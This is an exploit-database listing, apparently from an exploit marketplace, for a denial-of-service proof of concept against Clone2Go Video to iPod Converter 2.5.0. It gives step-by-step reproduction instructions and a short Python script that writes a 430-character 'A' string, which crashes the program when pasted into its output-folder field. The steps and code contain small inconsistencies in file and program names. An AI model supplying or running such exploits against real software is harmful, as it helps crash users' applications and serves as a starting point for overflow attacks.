[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Clone2Go Video to iPod Converter 2.5.0 - Denial of Service Exploit

Author
ZwX
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31118
Category
dos / poc
Date add
18-09-2018
Platform
windows
# Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
# Exploit Author: ZwX
# Vendor Homepage : http://www.clone2go.com/
# Software Link: http://www.clone2go.com/down/video-to-ipod-setup.exe
# Tested on OS: Windows 7 
 
# Proof of Concept (PoC):
# The local buffer overflow vulnerability can be exploited by local attackers with 
# restricted system user account without user interaction. For security demonstration 
# or to reproduce follow the provided information and steps below to continue.
 
# Manual steps to reproduce the vulnerability ...
# 1 Install the software and start the client
# 2 Copy  the AAAA...string from bof.txt to clipboard
# 3 Run VideoConverter.exex
# 4 Go Menu Menu > Edit > Options > Set Output folder (Input)
# 5 Paste it the input AAAA....string and click Open
# 6 A messagebox opens click ok
# 7 Software will stable crash or shut down
# 8 Successful reproduce of the Denial of Service
 
#!/usr/bin/python
 
buffer = "\x41" * 430
 
poc = buffer
file = open("poc.txt","w")
file.write(poc)
file.close()
  
print "POC Created by ZwX"

#  0day.today [2024-07-07]  #